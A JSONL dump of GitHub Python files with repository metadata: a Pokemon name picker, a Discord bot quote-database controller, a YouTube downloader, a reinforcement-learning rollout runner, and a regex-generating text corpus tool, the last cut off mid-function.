+{"seq_id": "71442091369", "text": "import requests\nimport random\n\n# Define the API endpoint for Pokemon names\napi_endpoint = \"https://pokeapi.co/api/v2/pokemon/?limit=1118\"\n\n# Make a request to the API and get the JSON response\nresponse = requests.get(api_endpoint).json()\n\n# Extract the list of Pokemon names from the response\npokemon_names = [pokemon['name'] for pokemon in response['results']]\n\n# Get a random Pokemon name from the list\nrandom_pokemon = random.choice(pokemon_names)\n\n# Capitalize the first letter of the Pokemon name\ncapitalized_pokemon = random_pokemon.capitalize()\n\n# Print the result\n# print(capitalized_pokemon)\n", "repo_name": "Shields003/pythonNPC", "sub_path": "getPokemon.py", "file_name": "getPokemon.py", "file_ext": "py", "file_size_in_byte": 601, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 8, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 14, "usage_type": "call"}]}
+{"seq_id": "30724153739", "text": "import logging\nfrom datetime import datetime\nfrom typing import List, Union\n\nimport discord\nfrom sqlalchemy import orm\n\n# noinspection PyUnresolvedReferences\nfrom kaztron.driver import database as db\nfrom kaztron.cog.quotedb.model import *\nfrom kaztron.driver.database import make_error_handler_decorator, func\nfrom kaztron.utils.discord import extract_user_id\n\nlogger = logging.getLogger(__name__)\n\ndb_file = 'quotedb.sqlite'\n\nengine = None\nSession = db.sessionmaker()\nsession = None\n\n\nclass UserNotFound(RuntimeError):\n pass\n\n\ndef init_db():\n global engine, session\n engine = db.make_sqlite_engine(db_file)\n Session.configure(bind=engine)\n session = Session()\n Base.metadata.create_all(engine)\n\n\non_error_rollback = make_error_handler_decorator(lambda *args, **kwargs: session, logger)\n\n\ndef query_user(server: discord.Server, id_: str):\n \"\"\"\n Find a user given an ID string passed by command, or create it if it does not exist.\n\n id_ can be passed to a command as a discord mention ``<@123456789012345678>`` or\n ``<@!123456789012345678>``, or as a Discord ID ``123456789012345678`` (various malformed\n inputs may also be accepted, e.g., ``@123456789012345678``).\n\n For Discord Mention or Discord ID, if the user is not found but exists on Discord, a new\n entry is created. In other cases, a :cls:`~.UserNotFound` error is raised.\n\n :raises UserNotFound: User was not found. Either the Discord user exists neither on Discord\n nor in the database, or a database ID was passed and could not be found.\n :raises discord.HTTPException: Discord API error occurred\n :raises db.exc.MultipleResultsFound: Should never happen - database is buggered.\n \"\"\"\n\n # Parse the passed ID\n try:\n discord_id = extract_user_id(id_)\n except discord.InvalidArgument:\n raise ValueError('Invalid Discord user ID format')\n logger.debug('query_user: passed Discord ID: {}'.format(discord_id))\n\n # Check if user exists\n try:\n db_user = session.query(User).filter_by(discord_id=discord_id).one()\n except db.orm_exc.MultipleResultsFound:\n logger.exception(\"Er, mate, I think we've got a problem here. \"\n \"The database is buggered.\")\n raise\n except db.orm_exc.NoResultFound:\n logger.debug('query_user: user not found, creating user')\n member = server.get_member(discord_id) # type: discord.Member\n if member is None:\n raise UserNotFound('Discord user not found')\n db_user = create_user(member)\n logger.debug('query_user: created user: {!r}'.format(db_user))\n else:\n logger.debug('query_user: found user: {!r}'.format(db_user))\n\n member = server.get_member(discord_id) # type: discord.Member\n if member:\n update_nicknames(db_user, member)\n else:\n logger.warning(\"Can't find user {!r} on Discord, skipping update nicknames\"\n .format(db_user))\n\n return db_user\n\n\n@on_error_rollback\ndef create_user(member: discord.Member) -> User:\n db_user = User(\n discord_id=member.id,\n name=member.nick if member.nick else member.name,\n username=member.name\n )\n session.add(db_user)\n session.commit()\n return db_user\n\n\ndef search_users(query: str) -> List[User]:\n \"\"\"\n Search for users.\n :param query: The substring to search for.\n :return:\n \"\"\"\n search_term_like = '%{}%'.format(query.replace('%', '\\\\%').replace('_', '\\\\_'))\n # noinspection PyUnresolvedReferences\n results = session.query(User) \\\n .filter(db.or_(User.name.ilike(search_term_like, escape='\\\\'),\n User.username.ilike(search_term_like, escape='\\\\'))) \\\n .order_by(User.name) \\\n .all()\n try:\n results[0]\n except IndexError:\n raise UserNotFound\n logger.info(\"search_users: Found {:d} results for {!r}\".format(len(results), query))\n return results\n\n\ndef random_quote() -> Quote:\n return session.query(Quote).order_by(func.random()).limit(1).one()\n\n\ndef get_total_quotes() -> int:\n return session.query(Quote).count()\n\n\ndef get_total_quoted_users() -> int:\n total = db.func.count(Quote.quote_id).label('total')\n return session.query(User).join(User.quotes).having(total > 0).group_by(User.user_id).count()\n\n\ndef get_top_quoted(num: int=3) -> List[Quote]:\n total = db.func.count(Quote.quote_id).label('total')\n return session.query(User, total).join(User.quotes) \\\n .group_by(Quote.author_id).order_by(db.desc(total)).limit(num).all()\n\n\ndef get_top_saved(num: int=3) -> List[Quote]:\n total = db.func.count(Quote.quote_id).label('total')\n return session.query(User, total).join(User.saved_quotes) \\\n .group_by(Quote.saved_by_id).order_by(db.desc(total)).limit(num).all()\n\n\ndef search_quotes(search_term: str=None, user: Union[User, List[User]]=None) -> List[Quote]:\n \"\"\"\n Fulltext search for quotes.\n :param search_term: The substring to search for.\n :param user: optional user to filter by\n \"\"\"\n\n if not user and not search_term:\n raise ValueError(\"Must specify at least 1 search criterion\")\n\n if user:\n user_list = [user] if isinstance(user, User) else user # type: List[User]\n else:\n user_list = []\n\n query = session.query(Quote)\n if user_list:\n # noinspection PyUnresolvedReferences\n query = query.filter(Quote.author_id.in_(u.user_id for u in user_list))\n\n if search_term:\n search_term_like = db.format_like(search_term)\n # noinspection PyUnresolvedReferences\n query = query.filter(Quote.message.ilike(search_term_like, escape='\\\\'))\n\n results = query.order_by(Quote.timestamp).all()\n try:\n results[0]\n except IndexError:\n raise orm.exc.NoResultFound\n logger.info(\"search_quotes: Found {:d} results for search_term={}, user_list={}\"\n .format(len(results), search_term, ','.join(u.name for u in user_list)))\n return results\n\n\n@on_error_rollback\ndef store_quote(\n user: User,\n saved_by: User,\n channel_id: str,\n message: str,\n timestamp: datetime=None):\n \"\"\"\n Store a new quote.\n :param user: Author of the note.\n :param saved_by: User who initiated storage of this note.\n :param channel_id: Channel in which the quote was said.\n :param message: User's message to retain as a quote.\n :param timestamp: Time at which quote was said (or stored, if unavailable).\n :return:\n \"\"\"\n if timestamp is None:\n timestamp = datetime.utcnow()\n\n logger.info(\"Inserting quote by {}...\".format(user))\n logger.debug(\"store_quote: user={!s} saved_by={!s} timestamp={} message={!r}\"\n .format(user, saved_by, timestamp.isoformat(' '), message))\n quote = Quote(\n timestamp=timestamp, author=user, saved_by=saved_by, channel_id=channel_id, message=message\n )\n session.add(quote)\n session.commit()\n return quote\n\n\n@on_error_rollback\ndef update_nicknames(user: User, member: discord.Member):\n \"\"\"\n Update a user's nicknames and usernames.\n \"\"\"\n logger.debug(\"update_nicknames: Updating names: {!r}...\".format(user))\n user.name = member.nick if member.nick else member.name\n user.username = member.name\n session.commit()\n logger.info(\"update_nicknames: Updated names: {!r}\".format(user))\n\n\n@on_error_rollback\ndef remove_quotes(quotes: List[Quote]):\n \"\"\"\n Delete a quote object from the database.\n \"\"\"\n for quote in quotes:\n logger.info(\"remove_quotes: Deleting quote {!r}...\".format(quote))\n session.delete(quote)\n session.commit()\n", "repo_name": "Worldbuilding/kaztron", "sub_path": "kaztron/cog/quotedb/controller.py", "file_name": "controller.py", "file_ext": "py", "file_size_in_byte": 7635, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 14, "usage_type": "call"}, {"api_name": "kaztron.driver.database.sessionmaker", "line_number": 19, "usage_type": "call"}, {"api_name": "kaztron.driver.database", "line_number": 19, "usage_type": "name"}, {"api_name": "kaztron.driver.database.make_sqlite_engine", "line_number": 29, "usage_type": "call"}, {"api_name": "kaztron.driver.database", "line_number": 29, "usage_type": "name"}, {"api_name": "kaztron.driver.database.make_error_handler_decorator", "line_number": 35, "usage_type": "call"}, {"api_name": "discord.Server", "line_number": 38, "usage_type": "attribute"}, {"api_name": "kaztron.utils.discord.extract_user_id", "line_number": 57, "usage_type": "call"}, {"api_name": "discord.InvalidArgument", "line_number": 58, "usage_type": "attribute"}, {"api_name": "kaztron.driver.database.orm_exc", "line_number": 65, "usage_type": "attribute"}, {"api_name": "kaztron.driver.database", "line_number": 65, "usage_type": "name"}, {"api_name": "kaztron.driver.database.orm_exc", "line_number": 69, "usage_type": "attribute"}, {"api_name": "kaztron.driver.database", "line_number": 69, "usage_type": "name"}, {"api_name": "discord.Member", "line_number": 90, "usage_type": "attribute"}, {"api_name": "kaztron.driver.database.or_", "line_number": 110, "usage_type": "call"}, {"api_name": "kaztron.driver.database", "line_number": 110, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 101, "usage_type": "name"}, {"api_name": "kaztron.driver.database.func.random", "line_number": 123, "usage_type": "call"}, {"api_name": "kaztron.driver.database.func", "line_number": 123, "usage_type": "name"}, {"api_name": "kaztron.driver.database.func.count", "line_number": 131, "usage_type": "call"}, {"api_name": "kaztron.driver.database.func", "line_number": 131, "usage_type": "attribute"}, {"api_name": "kaztron.driver.database", "line_number": 131, "usage_type": "name"}, {"api_name": "kaztron.driver.database.func.count", "line_number": 136, "usage_type": "call"}, {"api_name": "kaztron.driver.database.func", "line_number": 136, "usage_type": "attribute"}, {"api_name": "kaztron.driver.database", "line_number": 136, "usage_type": "name"}, {"api_name": "kaztron.driver.database.desc", "line_number": 138, "usage_type": "call"}, {"api_name": "kaztron.driver.database", "line_number": 138, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 135, "usage_type": "name"}, {"api_name": "kaztron.driver.database.func.count", "line_number": 142, "usage_type": "call"}, {"api_name": "kaztron.driver.database.func", "line_number": 142, "usage_type": "attribute"}, {"api_name": "kaztron.driver.database", "line_number": 142, "usage_type": "name"}, {"api_name": "kaztron.driver.database.desc", "line_number": 144, "usage_type": "call"}, {"api_name": "kaztron.driver.database", "line_number": 144, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 141, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 147, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 147, "usage_type": "name"}, {"api_name": "kaztron.driver.database.format_like", "line_number": 168, "usage_type": "call"}, {"api_name": "kaztron.driver.database", "line_number": 168, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.exc", "line_number": 176, "usage_type": "attribute"}, {"api_name": "sqlalchemy.orm", "line_number": 176, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 188, "usage_type": "name"}, {"api_name": "datetime.datetime.utcnow", "line_number": 199, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 199, "usage_type": "name"}, {"api_name": "discord.Member", "line_number": 213, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 225, "usage_type": "name"}]}
+{"seq_id": "71197424487", "text": "from pytube import YouTube\nimport os\nimport asyncio\n\n# link = \"https://youtu.be/EAYlckSaviI\"\nlink = input(\"Enter the link for the Youtube video to download: \")\n\ndownloadThisResolution = None\n\nyt = YouTube(link)\n\n# Create a folder with the name of playlist and execute the download code after navigating to the new Directory\ncurrentDir = os.getcwd()\n# print(currentDir)\nif(os.path.exists(f\"{currentDir}\\{yt.title}\")):\n print(f\"Folder {yt.title} already exists\")\n print(f\"Folder changed to {yt.title}\")\n os.chdir(yt.title) #Change directory\nelse: \n os.mkdir(yt.title) \t#Make directory\n os.chdir(yt.title)\n print(f\"Folder {yt.title} created\")\n print(f\"Folder changed to {yt.title}\")\n# print(os.getcwd())\n\nprint(f\"Downloading video: {yt.title}\")\n\n# get all the available resolutions of a video\npixels = yt.streams\navailableResolutions = list(enumerate(pixels))\nfor pix in availableResolutions:\n # print(pix)\n checkRes = str(pix[1])\n # print(checkRes)\n if(len(checkRes.split(\"720p\"))>1 and len(checkRes.split(\"video/mp4\"))>1 and len(checkRes.split(\"progressive=\\\"True\\\"\"))>1):\n print(pix[0])\n downloadThisResolution = pix[0]\n\n# print()\n# print(downloadThisResolution)\nasyncio.wait_for(pixels[downloadThisResolution].download())\nprint(f\"Video {yt.title} downloaded successfully!\")", "repo_name": "ManthanDhole/Youtube-Download-UtilityCode", "sub_path": "Single_YoutubeVideo_Downloader.py", "file_name": "Single_YoutubeVideo_Downloader.py", "file_ext": "py", "file_size_in_byte": 1331, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pytube.YouTube", "line_number": 10, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 18, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 20, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 21, "usage_type": "call"}, {"api_name": "asyncio.wait_for", "line_number": 41, "usage_type": "call"}]}
+{"seq_id": "10306042367", "text": "from helpers import PartialRollout\nimport threading\nimport six.moves.queue as queue\nimport tensorflow as tf\nimport pdb\nfrom collections import deque\nfrom demonstration_manager import DemonstrationManager\nimport numpy as np\n\nclass RunnerThread(threading.Thread):\n \"\"\"\nOne of the key distinctions between a normal environment and a universe environment\nis that a universe environment is _real time_. This means that there should be a thread\nthat would constantly interact with the environment and tell it what to do. This thread is here.\n\"\"\"\n def __init__(self, env, policy, num_local_steps, visualise, reward_f = None,record = False,shared=False,enemy = False):\n threading.Thread.__init__(self)\n self.record = record\n self.queue = queue.Queue(5)\n self.num_local_steps = num_local_steps\n self.env = env\n self.last_features = None\n self.policy = policy\n self.daemon = True\n self.sess = None\n self.shared=shared\n self.same_colours = enemy\n\n self.summary_writer = None\n self.visualise = visualise\n self.reward_f = reward_f\n\n def start_runner(self, sess, summary_writer):\n self.sess = sess\n self.summary_writer = summary_writer\n self.start()\n\n def run(self):\n with self.sess.as_default():\n self._run()\n\n def _run(self):\n if self.record:\n rollout_provider = recording_runner(self.env, self.policy, self.num_local_steps, self.summary_writer,\n self.visualise)\n else:\n #rollout_provider = conv_runner(self.env, self.policy, self.num_local_steps, self.summary_writer, self.visualise,reward_f=self.reward_f,shared=self.shared)\n rollout_provider = self.runner()\n while True:\n # the timeout variable exists because apparently, if one worker dies, the other workers\n # won't die with it, unless the timeout is set to some large number. This is an empirical\n # observation.\n\n self.queue.put(next(rollout_provider), timeout=600.0)\n\n\n def runner(self):\n\n \"\"\"\n The logic of the thread runner. In brief, it constantly keeps on running\n the policy, and as long as the rollout exceeds a certain length, the thread\n runner appends the policy to the queue.\n \"\"\"\n\n # ok so theres a bunch of options here. Theres a record mode. a convolution or lstm option for both policy and reward function\n # skip the recording part for now such that the two run similarly.\n ## Define here the configuration of the whole thing.\n\n external_reward = self.reward_f is not None\n shared = hasattr(self.policy,\"shared\")\n policy_type = self.policy.type\n reward_type = self.reward_f.type if external_reward else None\n\n last_state = self.env.reset()\n last_features = self.policy.get_initial_features() if self.policy.type =='lstm' else [None]\n\n if external_reward:\n if shared is False and reward_type=='lstm':\n r_features = self.reward_f.get_initial_features()\n elif shared is True and reward_type=='lstm':\n last_features,r_features = self.policy.get_initial_features()\n else:\n r_features =[None]\n\n if reward_type == 'conv':\n r_mem_size = self.reward_f.mem_size\n r_obs = np.zeros(self.reward_f.ob_space[:-1] + (r_mem_size,))\n else:\n r_obs = last_state\n irl_rewards = []\n\n if policy_type == 'conv':\n p_mem_size = self.policy.mem_size\n p_obs = np.zeros(self.policy.ob_space[:-1] + (p_mem_size,))\n else:\n p_obs = last_state\n\n\n length = 0\n rewards = 0\n\n while True:\n terminal_end = False\n rollout = PartialRollout()\n for _ in range(self.num_local_steps):\n\n if policy_type=='conv':\n p_obs[:, :, :p_mem_size - 1] = p_obs[:, :, 1:p_mem_size]\n p_obs[:, :, -1] = last_state[:, :, 0]\n elif policy_type=='lstm':\n p_obs = last_state\n fetched = self.policy.act([p_obs], *last_features)\n action, value_, = fetched[0], fetched[1]\n features = fetched[2:] if policy_type =='lstm' else [None]\n\n # argmax to convert from one-hot\n state, reward, terminal, info = self.env.step(action.argmax())\n if self.same_colours:\n wh = np.where(state > np.amin(state))\n state[wh[0], wh[1]] = 0.6\n actual_reward = reward\n if self.visualise:\n self.env.render()\n\n if external_reward:\n # If there is an external reward function use that.\n if reward_type == 'conv':\n r_obs[:, :, :r_mem_size - 1] = r_obs[:, :, 1:r_mem_size]\n r_obs[:, :, -1] = last_state[:, :, 0]\n else:\n r_obs = last_state\n\n r_fetched = self.reward_f.reward([r_obs],[action*(1-self.same_colours)])\n #reward = r_fetched[0][0,0] #-r_fetched[0][0,1] #if reward is binary class.\n reward = r_fetched[0][0]\n irl_rewards.append(reward)\n r_features = r_fetched[2] if reward_type == 'lstm' else [None]\n rollout.add(last_state, action, reward, value_, terminal, last_features,r_features)\n else:\n rollout.add(last_state, action, reward, value_, terminal, last_features)\n\n # collect the experience\n\n length += 1\n rewards += actual_reward\n\n last_state = state\n last_features = features\n\n if info:\n summary = tf.Summary()\n for k, v in info.items():\n summary.value.add(tag=k, simple_value=float(v))\n if self.reward_f is not None:\n summary.value.add(tag=\"global/discriminator_reward\", simple_value=float(reward))\n summary.value.add(tag=\"global/discriminator_reward_variance\", simple_value=np.var(irl_rewards))\n self.summary_writer.add_summary(summary, self.policy.global_step.eval())\n self.summary_writer.flush()\n\n timestep_limit = self.env.spec.tags.get('wrapper_config.TimeLimit.max_episode_steps')\n if terminal or length >= timestep_limit:\n terminal_end = True\n if length >= timestep_limit or not self.env.metadata.get('semantics.autoreset'):\n last_state = self.env.reset()\n last_features = self.policy.get_initial_features() if self.policy.type == 'lstm' else [None]\n if policy_type == 'conv':\n p_obs = np.zeros(self.policy.ob_space[:-1] + (p_mem_size,))\n if external_reward:\n if shared is False and reward_type == 'lstm':\n r_features = self.reward_f.get_initial_features()\n elif shared is True and reward_type == 'lstm':\n last_features, r_features = self.policy.get_initial_features()\n else:\n r_features = [None]\n if reward_type == 'conv':\n r_mem_size = self.reward_f.mem_size\n r_obs = np.zeros(self.reward_f.ob_space[:-1] + (r_mem_size,))\n else:\n r_obs = last_state\n print(\"Episode finished. Sum of rewards: %d. Length: %d\" % (rewards, length))\n #with tf.device(tf.train.replica_device_setter(1)):\n if external_reward:\n print(\"IRL REWARDS: {}. Average: {}\".format(np.sum(irl_rewards),np.mean(irl_rewards)))\n if len(irl_rewards) > 0:\n print(\"Max reward {}\".format(np.amax(irl_rewards)))\n irl_rewards=[]\n\n length = 0\n rewards = 0\n\n break\n\n if not terminal_end:\n rollout.r = self.policy.value([p_obs], *last_features)\n\n # once we have enough experience, yield it, and have the ThreadRunner place it on a queue\n yield rollout\n\n\ndef recording_runner(env, policy, num_local_steps, summary_writer, render):\n \"\"\"\n A thread runner that records the best and worse trajectories of the thread\n \"\"\"\n recorder = DemonstrationManager(\"../data/pong/demonstrations\")\n recorder_failure = DemonstrationManager(\"../data/pong/demonstrations_failure\")\n last_state = env.reset()\n last_features = policy.get_initial_features()\n length = 0\n rewards = 0\n demonstration = PartialRollout()\n while True:\n terminal_end = False\n rollout = PartialRollout()\n for _ in range(num_local_steps):\n fetched = policy.act([last_state], *last_features)\n action, value_, features = fetched[0], fetched[1], fetched[2:]\n\n\n # argmax to convert from one-hot\n state, reward, terminal, info = env.step(action.argmax())\n if render:\n env.render()\n\n rollout.add(last_state, action, reward, value_, terminal, last_features)\n\n demonstration.add(last_state, action, reward, value_, terminal, last_features)\n\n length += 1\n rewards += reward\n\n last_state = state\n last_features = features\n\n if info:\n summary = tf.Summary()\n for k, v in info.items():\n summary.value.add(tag=k, simple_value=float(v))\n summary_writer.add_summary(summary, policy.global_step.eval())\n summary_writer.flush()\n\n timestep_limit = env.spec.tags.get('wrapper_config.TimeLimit.max_episode_steps')\n if terminal or length >= timestep_limit:\n terminal_end = True\n if length >= timestep_limit or not env.metadata.get('semantics.autoreset'):\n last_state = env.reset()\n last_features = policy.get_initial_features()\n print(\"Episode finished. Sum of rewards: %d. Length: %d\" % (rewards, length))\n recorder.append_to_best(demonstration)\n recorder_failure.append_to_worst(demonstration)\n demonstration = PartialRollout()\n length = 0\n rewards = 0\n break\n\n if not terminal_end:\n rollout.r = policy.value([last_state], *last_features)\n\n # once we have enough experience, yield it, and have the ThreadRunner place it on a queue\n yield rollout", "repo_name": "KyriacosShiarli/gailf", "sub_path": "src/runner.py", "file_name": "runner.py", "file_ext": "py", "file_size_in_byte": 11073, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "threading.Thread", "line_number": 10, "usage_type": "attribute"}, {"api_name": "threading.Thread.__init__", "line_number": 17, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 17, "usage_type": "attribute"}, {"api_name": "six.moves.queue.Queue", "line_number": 19, "usage_type": "call"}, {"api_name": "six.moves.queue", "line_number": 19, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 94, "usage_type": "call"}, {"api_name": "helpers.PartialRollout", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.amin", "line_number": 119, "usage_type": "call"}, {"api_name": "tensorflow.Summary", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 156, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 167, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 177, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 185, "usage_type": "call"}, {"api_name": "demonstration_manager.DemonstrationManager", "line_number": 204, "usage_type": "call"}, {"api_name": "demonstration_manager.DemonstrationManager", "line_number": 205, "usage_type": "call"}, {"api_name": "helpers.PartialRollout", "line_number": 210, "usage_type": "call"}, {"api_name": "helpers.PartialRollout", "line_number": 213, "usage_type": "call"}, {"api_name": "tensorflow.Summary", "line_number": 235, "usage_type": "call"}, {"api_name": "helpers.PartialRollout", "line_number": 250, "usage_type": "call"}]}
+{"seq_id": "36623302224", "text": "import re\r\nimport hashlib\r\nimport io\r\nimport argparse\r\nfrom math import log\r\nfrom math import ceil\r\nfrom os import listdir\r\nfrom os.path import isfile, isdir, join\r\n\r\n\r\n\r\nclass RegexReport:\r\n def __init__(self):\r\n #Key is scope number, value is array of regex in that scope\r\n self.regStr = {}\r\n #Each element is line of text in the detailed report\r\n self.reportText = []\r\n\r\n\r\nclass Corpus:\r\n def __init__(self, window):\r\n self.corpusFiles = {}\r\n self.corpusTerms = {}\r\n self.window = window\r\n self.regStrList = []\r\n self.corpusNegFiles = {}\r\n self.corpusNegTerms = {}\r\n \r\n\r\n def Update(self):\r\n self.UpdatePos()\r\n self.UpdateNeg()\r\n \r\n def UpdatePos(self):\r\n self.corpusTerms = {}\r\n for file in list(self.corpusFiles):\r\n for x in list(self.corpusFiles[file].terms):\r\n if( self.corpusFiles[file].terms[x].Value not in self.corpusTerms ):\r\n self.corpusTerms[self.corpusFiles[file].terms[x].Value] = Term( self.corpusFiles[file].terms[x].Value )\r\n else:\r\n self.corpusTerms[self.corpusFiles[file].terms[x].Value].Count = 1 + self.corpusTerms[self.corpusFiles[file].terms[x].Value].Count\r\n self.corpusTerms[self.corpusFiles[file].terms[x].Value].Neighbors = self.corpusFiles[file].terms[x].Neighbors + self.corpusTerms[self.corpusFiles[file].terms[x].Value].Neighbors\r\n \r\n def UpdateNeg(self):\r\n self.corpusNegTerms = {}\r\n for file in list(self.corpusNegFiles):\r\n for x in list(self.corpusNegFiles[file].terms):\r\n if( self.corpusNegFiles[file].terms[x].Value not in self.corpusNegTerms ):\r\n self.corpusNegTerms[self.corpusNegFiles[file].terms[x].Value] = Term( self.corpusNegFiles[file].terms[x].Value )\r\n else:\r\n self.corpusNegTerms[self.corpusNegFiles[file].terms[x].Value].Count = 1 + self.corpusNegTerms[self.corpusNegFiles[file].terms[x].Value].Count\r\n self.corpusNegTerms[self.corpusNegFiles[file].terms[x].Value].Neighbors = self.corpusNegFiles[file].terms[x].Neighbors + self.corpusNegTerms[self.corpusNegFiles[file].terms[x].Value].Neighbors\r\n\r\n def AddPosFile(self, fullName):\r\n f = open(fullName, \"br\")\r\n binary = f.read()\r\n sha256 = hashlib.sha256(binary).hexdigest()\r\n f = io.open(fullName, mode=\"r\", encoding=\"utf-8\")\r\n NewTermsList = f.read()\r\n CurFile = File(sha256,fullName)\r\n\r\n num = 0\r\n while ( num < ( len(NewTermsList) - 1) ):\r\n if( NewTermsList[num] not in CurFile.terms ):\r\n NewTerm = Term( NewTermsList[num] )\r\n CurFile.terms[NewTermsList[num]] = NewTerm\r\n else:\r\n CurFile.terms[NewTermsList[num]].Count = 1 + CurFile.terms[NewTermsList[num]].Count\r\n\r\n\r\n #get neighbor words, before and after if applicapble\r\n prevNum = num - self.window\r\n nextNum = num + self.window\r\n while( prevNum < num):\r\n if( prevNum > 0 ):\r\n # get the value of the 4-digit Unicode in \\uhhhh format\r\n UniHex = str(\"\\\\\\\\\") + \"x{\" + str(format( ord(NewTermsList[prevNum]), '04x')) +\"}\"\r\n position = prevNum - num\r\n CurFile.terms[NewTermsList[num]].Neighbors.append((NewTermsList[prevNum],position,UniHex))\r\n prevNum = prevNum + 1\r\n while( nextNum > num ):\r\n if( nextNum < ( len(NewTermsList) - 1) ):\r\n # get the value of the 4-digit Unicode in \\uhhhh format\r\n UniHex = str(\"\\\\\\\\\") + \"x{\" + str(format( ord(NewTermsList[nextNum]), '04x')) +\"}\"\r\n position = nextNum - num\r\n CurFile.terms[NewTermsList[num]].Neighbors.append((NewTermsList[nextNum],position,UniHex))\r\n nextNum = nextNum - 1\r\n\r\n num = num + 1\r\n\r\n self.corpusFiles[CurFile.sha256] = CurFile\r\n f.close()\r\n NewTermsList = \"\"\r\n\r\n def AddNegFile(self, fullName):\r\n f = open(fullName, \"br\")\r\n binary = f.read()\r\n sha256 = hashlib.sha256(binary).hexdigest()\r\n f = io.open(fullName, mode=\"r\", encoding=\"utf-8\")\r\n NewTermsList = f.read()\r\n CurFile = File(sha256,fullName)\r\n\r\n num = 0\r\n while ( num < ( len(NewTermsList) - 1) ):\r\n if( NewTermsList[num] not in CurFile.terms ):\r\n NewTerm = Term( NewTermsList[num] )\r\n CurFile.terms[NewTermsList[num]] = NewTerm\r\n else:\r\n CurFile.terms[NewTermsList[num]].Count = 1 + CurFile.terms[NewTermsList[num]].Count\r\n\r\n\r\n #get neighbor words, before and after if applicapble\r\n prevNum = num - self.window\r\n nextNum = num + self.window\r\n while( prevNum < num):\r\n if( prevNum > 0 ):\r\n # get the value of the 4-digit Unicode in \\uhhhh format\r\n UniHex = str(\"\\\\\\\\\") + \"x{\" + str(format( ord(NewTermsList[prevNum]), '04x')) +\"}\"\r\n position = prevNum - num\r\n CurFile.terms[NewTermsList[num]].Neighbors.append((NewTermsList[prevNum],position,UniHex))\r\n prevNum = prevNum + 1\r\n while( nextNum > num ):\r\n if( nextNum < ( len(NewTermsList) - 1) ):\r\n # get the value of the 4-digit Unicode in \\uhhhh format\r\n UniHex = str(\"\\\\\\\\\") + \"x{\" + str(format( ord(NewTermsList[nextNum]), '04x')) +\"}\"\r\n position = nextNum - num\r\n CurFile.terms[NewTermsList[num]].Neighbors.append((NewTermsList[nextNum],position,UniHex))\r\n nextNum = nextNum - 1\r\n\r\n num = num + 1\r\n\r\n self.corpusNegFiles[CurFile.sha256] = CurFile\r\n f.close()\r\n NewTermsList = \"\"\r\n\r\n def GenerateRegStrList(self):\r\n NegativeTerms = list(self.corpusNegTerms)\r\n for x in list(self.corpusTerms): \r\n posSet = [None for x in range((self.window * 2 ) + 1) ]\r\n negSet = [None for x in range((self.window * 2 ) + 1) ]\r\n regexStr = \"\"\r\n num = -1 * self.window\r\n order = []\r\n if x in NegativeTerms:\r\n #Add the anchor value to the array\r\n negSet[0] = {\"\\\\\" + self.corpusNegTerms[x].UniHex: (self.corpusNegTerms[x].Value,0,\"\\\\\" + self.corpusNegTerms[x].UniHex)}\r\n for y in self.corpusNegTerms[x].Neighbors:\r\n if( negSet[y[1]] == None ):\r\n newDict = {}\r\n newDict[y[2]] = 1\r\n negSet[y[1]] = newDict\r\n else:\r\n if y[2] not in list(negSet[y[1]]):\r\n negSet[y[1]][y[2]] = 1\r\n else:\r\n negSet[y[1]][y[2]] = negSet[y[1]][y[2]] + 1 \r\n \r\n #Add the key value to the array\r\n posSet[0] = {self.corpusTerms[x].UniHex: (self.corpusTerms[x].Value,0,self.corpusTerms[x].UniHex)}\r\n for y in self.corpusTerms[x].Neighbors:\r\n if( posSet[y[1]] == None ):\r\n newDict = {}\r\n newDict[y[2]] = 1\r\n posSet[y[1]] = newDict\r\n else:\r\n if y[2] not in list(posSet[y[1]]):\r\n posSet[y[1]][y[2]] = 1\r\n else:\r\n posSet[y[1]][y[2]] = posSet[y[1]][y[2]] + 1\r\n \r\n while num <= self.window:\r\n order.append( num)\r\n num = num + 1\r\n badRegexStr = False\r\n for index in order:\r\n if posSet[index] != None:\r\n sortedkeys = sorted(posSet[index], key=posSet[index].get, reverse=True) \r\n regexStr = regexStr + \"[\"\r\n charAdded = 0\r\n if index != 0:\r\n for x in sortedkeys:\r\n if negSet[index] != None and x not in list(negSet[index]):\r\n regexStr = regexStr + x\r\n charAdded = charAdded + 1\r\n elif negSet[index] == None or negSet[index][x] == None: \r\n regexStr = regexStr + x\r\n charAdded = charAdded + 1\r\n else:\r\n pass\r\n if charAdded == 0:\r\n badRegexStr = True\r\n regexStr = regexStr + \"]\"\r\n else:\r\n regexStr = regexStr + list(posSet[index])[0]\r\n 